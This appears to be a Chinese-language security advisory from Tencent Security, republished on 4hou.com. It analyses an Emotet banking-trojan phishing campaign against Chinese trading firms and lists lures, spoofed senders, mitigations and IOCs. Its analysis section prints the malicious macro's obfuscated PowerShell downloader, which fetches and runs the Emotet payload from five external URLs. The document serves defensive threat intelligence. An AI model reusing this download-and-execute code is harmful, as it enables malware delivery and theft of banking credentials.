安全预警:Emotet银行木马针对国内企业的攻击增加

腾讯安全 新闻 2019年9月28日发布
Favorite收藏

导语:Emotet具有用于进行银行欺诈的模块,主要针对德国,奥地利和瑞士的银行进行攻击,多年来,该恶意软件被全球安全厂商归类为银行木马。

一、背景

Emotet具有用于进行银行欺诈的模块,主要针对德国,奥地利和瑞士的银行进行攻击,多年来,该恶意软件被全球安全厂商归类为银行木马。近期,腾讯安全御见威胁情报中心监测到Emotet银行木马针对国内的攻击呈明显上升趋势,从事进出口贸易的企业是Emotet银行木马的主要目标。

此次攻击具有以下特点:

1.钓鱼邮件利用恶意宏代码下载攻击载荷;

2.钓鱼邮件使用德语、西班牙语、波兰语、英语等多种语言;

3.攻击者伪造大量虚假邮箱作为发件人(超过100个,详见IOCs);

4.攻击载荷Emotet会继续下载其他银行木马作为Payload;

5.银行木马能够检测用户银行登录行为,通过读取隐私数据获取账号密码登录信息,甚至通过注入恶意代码到交互页面,从而在用户进行网银相关操作时盗取帐户资产。

部分受攻击企业如下: 

image.png

根据腾讯安全御见威胁情报中心统计数据,Emotet针对国内的钓鱼邮件攻击最严重地区为广东省、北京市、上海市、江苏省等地。该病毒影响的地区分布如下: 

image.png

从病毒攻击影响的行业来看,受害最严重的是传统制造业、教育咨询(特别是国际教育)、商务贸易。具体受影响行业分布如下:

image.png

二、详细分析

攻击者构造大量虚假发件人(完整列表见IOCs):

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

。。。

钓鱼邮件使用德语、西班牙语、波兰语、英语等多种语言。

德语:

image.png

西班牙语: 

image.png

英语:

image.png

邮件主题通常涉及交易,付款和发票。包括:“ ACH付款信息”,“付款通知”,“发票交易”,“逾期付款”,“已付款发票”,“销售发票”,“状态更新”,“所需文件”,“新订单” ,“收据”。

image.png

有意思的是,我们在溯源过程中还发现了某精密仪器制造公司georgfischer收到的来自邮件服务商ix.netcom.com的威胁告警邮件,邮件提醒该公司警惕正在发生的攻击。

邮件标题及译文如下:

Attention! – Please be careful with email attachments. A Virus – Trojan attack is currently under way (TA542:)

译文:

注意!-请小心电子邮件附件。病毒-特洛伊木马正在进行攻击(TA542:)

image.png

根据对应的官网介绍,被警告的公司georgfischer创建于1802 年,总部位于瑞士,在 33 个国家经营着140家公司,其中57家是生产基地,业务覆盖液体气体安全输送、轻质铸造件以及高精度制造技术等领域,是一家跨国集团公司。

image.png

Georgfischer的相关人员在收到邮件服务商的提醒邮件后,又将邮件文件打包发给了德国电信公司旗下网络安全公司t-systems.com,并请求该公司将攻击邮件的发件人使用的邮箱锁定,以期达到防御目标。

邮件内容及译文如下:

Dear helpdesk,

Dear Janos

Kindly check whether fraud attack and block this sender

Best Helmut

译文:

Dear helpdesk,

Dear Janos

请检查是否有欺诈攻击并阻止此发件人

Best Helmut 

image.png

被求助的t-systems是德国电信(DeutscheTelekom)子公司,该公司提供网络基础设施服务。 

image.png

我们捕获到攻击者使用的钓鱼邮件附件文档名如下:

SCAN_5PYSF6A1BR.doc

DOC_NPKICRA3C6LQW9Y_ACD.doc

Dok_393027_2112976231.rtf

Santander 682634154514193.doc

INF_XOUZRYAJ7TZ9G6J_18092019.doc

Alb. 525        .doc

DOK_62597273590_A.doc

055843559 factura septiembre.doc

INF_931516975144_B.doc

附件文档中均附带恶意的宏代码: 

image.png

宏代码利用Powershell下载银行木马emotet,下载时使用的URL地址以“@”分割记录,其中的5个地址会被依次请求进行下载。

$DIiMMwdP='pw79UV5N';$r89Bqv9M = '523';$z1oZiDj='Ol_qmEC';$Lj6JlLHz=$env:userprofile+'\'+$r89Bqv9M+'.exe';
$qt4En6DB='R3vqiSFT';$CiILkHUo=.('ne'+'w-ob'+'ject') neT.wEbCLIENt;$qWG_jzZV='
http[:]//shael.org/hosting/TYXchcKkHz/
@http[:]//www.lottizzazionesavarra.it/wp-admin/zMifZDPur/
@https[:]//herrenmode.tk/5usqjlew/ttg22zcf_q5chov-377215/
@http[:]//nfbio.com/img/upload_Image/edm/pic_2/u6q4ucq7_hyg8uzhh-369963559/
@http[:]//endofhisrope.net/2008-08_PSBearDonate/qmiuOZvDj/'."Sp`LiT"('@');$lt5rEpMz='NTMPsFi';
foreach($AkOZPzW in $qWG_jzZV){try{$CiILkHUo."dO`w`Nl`oAdfile"($AkOZPzW, $Lj6JlLHz);$lWdD4O='vbXhwM6';If ((&('Get-'+'I'+'tem') $Lj6JlLHz)."L`eNgTH" -ge 24814) {[Diagnostics.Process]::"STa`Rt"($Lj6JlLHz);$K_0tQwob='a9dvKGGb';break;$BcRHRV4='FSAmRV6'}}catch{}}$ErZcNH='wnWqFd_a'

下载Emotet网络流量如下: 

image.png

早期版本的Emotet具有银行欺诈模块,主要针对银行进行攻击。更高版本的Emotet不再加载其自己的银行木马模块,而是加载第三方银行木马恶意软件。

Emotet收集系统信息,加密后发送至服务器,然后继续下载第三方载荷,包括Qbot,The Trick,IcedID和Gootkit等木马。

image.png

这些银行木马最终通过检测用户网银登录行为,通过读取隐私数据获取账号密码信息,甚至通过注入恶意代码到交互页面,从而在用户的银行相关操作过程时盗取账户资产及机密信息。

三、安全建议

1、我们建议企业邮箱网管根据本文末尾提供的IOCs信息,将危险发件人邮箱设置为黑名单;

2、建议企业通过培训,教育员工不要打开不明来源的邮件附件,对于附件中的文件要谨慎打开,如果附件是可执行程序,一定不要随意运行;

3、升级office系列软件到最新版本,及时修复office组件漏洞,除非确认文档来源可靠,否则不要启用宏;

IOCs

发件邮箱

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]apegypt.com

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

[email protected]

DOC(钓鱼邮件附件文件)

69163d86ceec013b59fc929cee88e07a

7b14e01fe4fe705a3add1a9d1c3aba42

00f502fb9fdc87e892b6f13260c5dde5

dd29f94772fec370c9fe01efb6d9ae47

6e5334da4bf6e579eb227ddba9c96e48

2c5ef063217fb3989bbe464265b5c894

f273d0014aaf58ed56a557b0531f339a

29df0bb5c6d77bd88eba85409f4f9172

82f0ee5d0f009f989e0ab3f9fe37aa86

d04617c9f25d729e7db52cc009e175d0

d206d5bd7fd0f9218ddab766de9d326a

e013e8ac575eeab6195caf07085098bc

2f2b014b7348a9aa3b1ccddf5b20be56

ba8533dcc3053527a08afafdab094373

ba222b5181a1429511c061176503cad7

64be822e76a6c19e2e11e22cb755e1b8

9de79dfc8de476a5f3908f934b33a937

fe8c07e33eadafab80e9a8e1351eee0d

Emotet

4f34a0fcc16ae643624d1f5a7d048a99

d27f692276898374f578ab6d207ab063

Domain

shael.org

lottizzazionesavarra.it

nfbio.com

herrenmode.tk

endofhisrope.net

IP

190.106.97.230

186.75.241.230

URL

http[:]//shael.org/hosting/TYXchcKkHz/

http[:]//shael.org/cgi-sys/suspendedpage.cgi

http[:]//www.lottizzazionesavarra.it/wp-admin/zMifZDPur/

http[:]//nfbio.com/img/upload_Image/edm/pic_2/u6q4ucq7_hyg8uzhh-369963559/

https[:]//herrenmode.tk/5usqjlew/ttg22zcf_q5chov-377215/

http[:]//endofhisrope.net/2008-08_PSBearDonate/qmiuOZvDj/

http[:]//190.106.97.230/report/health/add/merge/

http[:]//186.75.241.230/img/jit/xian/

http[:]//186.75.241.230/glitch/enabled/

参考链接:

https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta542-banker-malware-distribution-service

如若转载,请注明原文地址: https://www.4hou.com/info/news/20591.html
点赞 0
  • 分享至
取消

感谢您的支持,我会继续努力的!

扫码支持

打开微信扫一扫后点击右上角即可分享哟

发表评论